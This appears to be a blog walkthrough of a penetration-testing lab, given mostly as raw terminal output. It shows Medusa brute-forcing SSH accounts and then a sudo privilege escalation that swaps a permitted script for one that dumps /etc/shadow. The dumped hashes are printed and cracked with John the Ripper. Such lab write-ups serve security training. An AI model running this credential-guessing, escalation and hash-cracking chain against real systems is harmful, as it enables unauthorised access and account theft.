ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalvarez (23 of 49, 22 complete) Password: 666666 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalvarez Password: 666666 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jayala (24 of 49, 23 complete) Password: michael (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jayala Password: michael [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jbresnahan (25 of 49, 24 complete) Password: Password

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jbresnahan Password: Password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jdavenport (26 of 49, 25 complete) Password: babyl0n

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jdavenport Password: babyl0n [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jduff (27 of 49, 26 complete) Password: trustno1 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jduff Password: trustno1 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jfranklin (28 of 49, 27 complete) Password: password

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jfranklin Password: password [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kclemons (29 of 49, 28 complete) Password: killer (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kclemons Password: killer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: krenfro (30 of 49, 29 complete) Password: gizmodo (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: krenfro Password: gizmodo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ktso (31 of 49, 30 complete) Password: computer (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ktso Password: computer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: kwebber (32 of 49, 31 complete) Password: lifehack (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: kwebber Password: lifehack [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmartinez (33 of 49, 32 complete) Password: michelle

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmartinez Password: michelle [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: lmorales (34 of 49, 33 complete) Password: master (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: lmorales Password: master [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mbryan (35 of 49, 34 complete) Password: pepper (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mbryan Password: pepper [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mholland (36 of 49, 35 complete) Password: baseball

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mholland Password: baseball [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mnader (37 of 49, 36 complete) Password: soccer (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mnader Password: soccer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: mrodriguez (38 of 49, 37 complete) Password: jordan

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: mrodriguez Password: jordan [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: myajima (39 of 49, 38 complete) Password: 12345 (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: myajima Password: 12345 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: qpowers (40 of 49, 39 complete) Password: 12345678 (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: qpowers Password: 12345678 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rdominguez (41 of 49, 40 complete) Password: gawker

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rdominguez Password: gawker [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rjacobson (42 of 49, 41 complete) Password: internet

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rjacobson Password: internet [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: rpatel (43 of 49, 42 complete) Password: 0 (1 of 1

complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: rpatel Password: 0 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sgains (44 of 49, 43 complete) Password: batman (1 of

1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sgains Password: batman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: sjohnson (45 of 49, 44 complete) Password: football

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: sjohnson Password: football [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: strammel (46 of 49, 45 complete) Password: dragon (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: strammel Password: dragon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: swarren (47 of 49, 46 complete) Password: shadow (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: swarren Password: shadow [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tdeleon (48 of 49, 47 complete) Password: qwerty (1

of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tdeleon Password: qwerty [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: tgoodchap (49 of 49, 48 complete) Password: letmein

(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: tgoodchap Password: letmein [SUCCESS]
GENERAL: Medusa has finished.

root@kali:~# ssh aadams@192.168.1.120
aadams@192.168.1.120's password:
Linux 2.6.27.27.
aadams@slax:~$
aadams@slax:~$ uname -a
Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2600 CPU @ 3.40GHz GenuineIntel

GNU/Linux
aadams@slax:~$ id
uid=1005(aadams) gid=100(users) groups=100(users)
aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Sorry, user aadams may not run sudo on slax.
aadams@slax:~$

aadams@slax:~$ cat /etc/group
root:x:0:root
bin:x:1:root,bin
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
audio:x:17:root
video:x:18:root
cdrom:x:19:root
games:x:20:
slocate:x:21:
utmp:x:22:
smmsp:x:25:smmsp
tape:x:26:root
mysql:x:27:
rpc:x:32:
sshd:x:33:sshd
gdm:x:42:
shadow:x:43:
ftp:x:50:
apache:x:80:
messagebus:x:81:
haldaemon:x:82:
plugdev:x:83:root
power:x:84:
pop:x:90:pop
scanner:x:93:
nobody:x:98:nobody
nogroup:x:99:
users:x:100:ccoffee
console:x:101:
admin:x:102:ccoffee

root@kali:~# ssh ccoffee@192.168.1.120
ccoffee@192.168.1.120's password:
Linux 2.6.27.27.
ccoffee@slax:~$

ccoffee@slax:~$ ls -al
total 12
drwx------  3 ccoffee users  120 Jan 13 10:20 ./
dr-xr-xr-x 53 root    root  1040 Jan 13 10:20 ../
-rwx------  1 ccoffee users 3729 Jan 13 10:20 .screenrc*
-rwx------  1 ccoffee users  779 Jan 13 10:20 .xsession*
-rwx------  1 ccoffee users   57 Jan 13 10:20 DONOTFORGET*
drwx------  2 ccoffee users   60 Jan 13 10:20 scripts/

ccoffee@slax:~$ ls -al scripts/
total 4
drwx------ 2 ccoffee users  60 Jan 13 10:20 ./
drwx------ 3 ccoffee users 120 Jan 13 10:20 ../
-rws--x--x 1 root    admin 110 Jan 13 10:20 getlogs.sh*

ccoffee@slax:~$ cat scripts/getlogs.sh
cat: scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo cat scripts/getlogs.sh

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

Password:
Sorry, user ccoffee is not allowed to execute '/usr/bin/cat scripts/getlogs.sh' as root on slax.
ccoffee@slax:~$ sudo -l
User ccoffee may run the following commands on this host:
    (root) NOPASSWD: /home/ccoffee/scripts/getlogs.sh

ccoffee@slax:~$ /home/ccoffee/scripts/getlogs.sh
/bin/bash: /home/ccoffee/scripts/getlogs.sh: Permission denied
ccoffee@slax:~$ sudo /home/ccoffee/scripts/getlogs.sh
wrong!

ccoffee@slax:~$ cd scripts
ccoffee@slax:~/scripts$ mv getlogs.sh getlogs.sh.old
ccoffee@slax:~/scripts$ vi getlogs.sh

#!/bin/bash
whoami
id
cat /etc/shadow

ccoffee@slax:~/scripts$ chmod 744 getlogs.sh

ccoffee@slax:~/scripts$ sudo /home/ccoffee/scripts/getlogs.sh
root
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18

(video),19(cdrom),26(tape),83(plugdev)
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
qpowers:$1$eob/a4xo$fPoSwbgY22gWL8qyDU/.I.:16083:0:99999:7:::
mbryan:$1$tmf/f4xo$awoQgL2oPSZMX2lM12Uln1:16083:0:99999:7:::
dgrant:$1$OCh/k4xo$JDbEKsV06nre8zZPrRUvo/:16083:0:99999:7:::
dgilfillan:$1$8hi/p4xo$bWC1IcRe1crQa3s3miuL20:16083:0:99999:7:::
jbresnahan:$1$2Xk/u4xo$mjNw/vkqgdGQTIeYGK8nZ.:16083:0:99999:7:::
aadams:$1$Ttl/z4xo$UZgXCB9PGAEWTrzVJVp3K/:16083:0:99999:7:::
aweiland:$1$sQn/25xo$9y6kbW.j6RQnVz2HMP2141:16083:0:99999:7:::
cchisholm:$1$5to/75xo$6YN0xmN17AsQPldEBdPMC.:16083:0:99999:7:::
jfranklin:$1$DIq/C5xo$WmJvdtiujSkcO1/f2hr8s/:16083:0:99999:7:::
hlovell:$1$Rkr/H5xo$zu11N6JklFJOUxyb1tXTA0:16083:0:99999:7:::
bphillips:$1$eAt/M5xo$iTE1y4NzYBURlA/uLHkdb1:16083:0:99999:7:::
myajima:$1$LXu/R5xo$jLAlFMb.ocYtzQT3O02Mi.:16083:0:99999:7:::
jalcantar:$1$.Aw/W5xo$kvbWzSN38YbHd.fmsPKPh1:16083:0:99999:7:::
jayala:$1$ecx/b5xo$.n631jVFY7Brc2/mmtTJy0:16083:0:99999:7:::
aard:$1$N8z/g5xo$nvfHME6ROtq92qj9RLPFc0:16083:0:99999:7:::
aharp:$1$gd.0l5xo$1rN6r2UE6ssSQI091mcCa1:16083:0:99999:7:::
lmorales:$1$k/00q5xo$S0R/p4g1IsMwpK8Oh.J34.:16083:0:99999:7:::
kclemons:$1$xc10v5xo$CkntJIYKf2uD0wkiJ2HC00:16083:0:99999:7:::
tgoodchap:$1$y/30.6xo$PocUVCFGi9zAM3osucjfl1:16083:0:99999:7:::
tdeleon:$1$Yf4036xo$D/.NeIj324zQsz/UYQsPd0:16083:0:99999:7:::
krenfro:$1$rC6086xo$lZeDnadKgbe26e4C7Yh641:16083:0:99999:7:::
bbanter:$1$yb70D6xo$iZxi1cgaS/uLhmqhEv23Y0:16083:0:99999:7:::
aspears:$1$q790I6xo$hkQF4V5lQGAnzQwlr/Lvk0:16083:0:99999:7:::
djohnson:$1$cSA0N6xo$W62.B.xUGGpa/m.HpXD5w0:16083:0:99999:7:::
aheflin:$1$R4C0S6xo$qt/DDWtf7yneePutW7TW7.:16083:0:99999:7:::
jdavenport:$1$egt0a8xo$Lws.tBjdDpD.znXdUmj8H1:16083:0:99999:7:::
sgains:$1$tyE0c6xo$Q52MI4/PcHRpgUPaoy8UH.:16083:0:99999:7:::
swarren:$1$uTG0h6xo$EhiWJ6pmGy7QjrPg6cPcn.:16083:0:99999:7:::
rdominguez:$1$btH0m6xo$sPSjaDORJ7pbgflVMitKW.:16083:0:99999:7:::
ktso:$1$fQJ0r6xo$gpc5PjEw/l4VMBI.VhXnP/:16083:0:99999:7:::
amaynard:$1$NqK0w6xo$jXNsulUt9dqAZ4QRbc9oC1:16083:0:99999:7:::
lmartinez:$1$nNM0/7xo$7vOUEgfCSw0hGuGuprMRO1:16083:0:99999:7:::
dwestling:$1$coN047xo$8OuVbRrIUfs3EEPnq4bkI0:16083:0:99999:7:::
dtraylor:$1$SHP097xo$FSYeULOeFe2GuqoRTN/6r1:16083:0:99999:7:::
jalvarez:$1$JnQ0E7xo$tniBSw30ynprzjZUhuGUw0:16083:0:99999:7:::
mrodriguez:$1$JMS0J7xo$Qx1XpV6Yic0pmkuiZ.Txd/:16083:0:99999:7:::
rjacobson:$1$MxT0O7xo$QCmvDFxusxS9kxc4r./121:16083:0:99999:7:::
dcooper:$1$rhV0T7xo$28uQIQes7LxuYP3cOOwkE.:16083:0:99999:7:::
mholland:$1$m9X0Y7xo$vs7fehRv9EsaPuA.1Kmem1:16083:0:99999:7:::
aallen:$1$fnY0d7xo$aotMzNPT380HaEKgBB2Fd0:16083:0:99999:7:::
ccoffee:$1$XTa0i7xo$iji75/uqgm4yjzEjhCogr/:16083:0:99999:7:::
sjohnson:$1$e8c0n7xo$56pZc850Z/jVyfytGmBoX0:16083:0:99999:7:::
bwatkins:$1$Tjd0s7xo$8cabV.U80eIG6e7QfwAoN.:16083:0:99999:7:::
kwebber:$1$Dbf0x7xo$yErk7QzGlwUicnNXAI5S91:16083:0:99999:7:::
rpatel:$1$gEh008xo$Vf9/sa3I8y.ZAVVyvmIwU.:16083:0:99999:7:::
jduff:$1$Lki058xo$FaxE0BYi59/Brd/S0MKxT.:16083:0:99999:7:::
mnader:$1$tKk0A8xo$RqOuKq1VLQUaLhjxLV4yL/:16083:0:99999:7:::
strammel:$1$pyl0F8xo$8iJPFq2KWil4NBRKARDTu1:16083:0:99999:7:::
dstevens:$1$CQn0K8xo$4lawd8BU2mdjLfxm2N1WM0:16083:0:99999:7:::

root@kali:~# john shadow1
Loaded 50 password hashes with 50 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
qwerty           (tdeleon)
12345            (myajima)
password         (jfranklin)
123456           (amaynard)
computer         (ktso)
12345678         (qpowers)
abc123           (dgilfillan)
internet         (rjacobson)
shadow           (swarren)
baseball         (mholland)
letmein          (tgoodchap)
michael          (jayala)
dragon           (strammel)
michelle         (lmartinez)
jordan           (mrodriguez)
trustno1         (jduff)
soccer           (mnader)
football         (sjohnson)
batman           (sgains)
iloveyou         (bbanter)
pepper           (mbryan)
jennifer         (dstevens)
master           (lmorales)
monkey           (aspears)
sunshine         (bphillips)
whatever         (aadams)
welcome          (hlovell)
111111           (djohnson)
666666           (jalvarez)
654321           (aheflin)
killer           (kclemons)
princess         (ccoffee)
superman         (bwatkins)
123123           (aweiland)
1234567          (cchisholm)
cheese           (dgrant)
starwars         (dtraylor)
Password         (jbresnahan)
nintendo         (aallen)
passw0rd         (aharp)
blahblah         (dwestling)
pokemon          (jalcantar)
0                (rpatel)
guesses: 43  time: 0:00:01:34 0.00% (3)  c/s: 29442  trying: markey10 - marketio
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

root@kali:~# cat shadow2
root:$1$m6t0Y8xo$qUweOAwTBe99YU2Xbf13h1:16083:0:::::

root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/darkc0de.lst
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0  time: 0:00:00:50 DONE (Mon Jan 13 13:22:46 2014)  c/s: 29222  trying: �migr� - �f

root@kali:~# john shadow2 --wordlist=/usr/share/wordlists/rockyou.txt
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
guesses: 0  time: 0:00:08:10 DONE (Mon Jan 13 13:32:19 2014)  c/s: 29211  trying:      123d - * 7¡Vamos!

That's all.

Nincsenek megjegyzések:

Megjegyzés küldése

Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.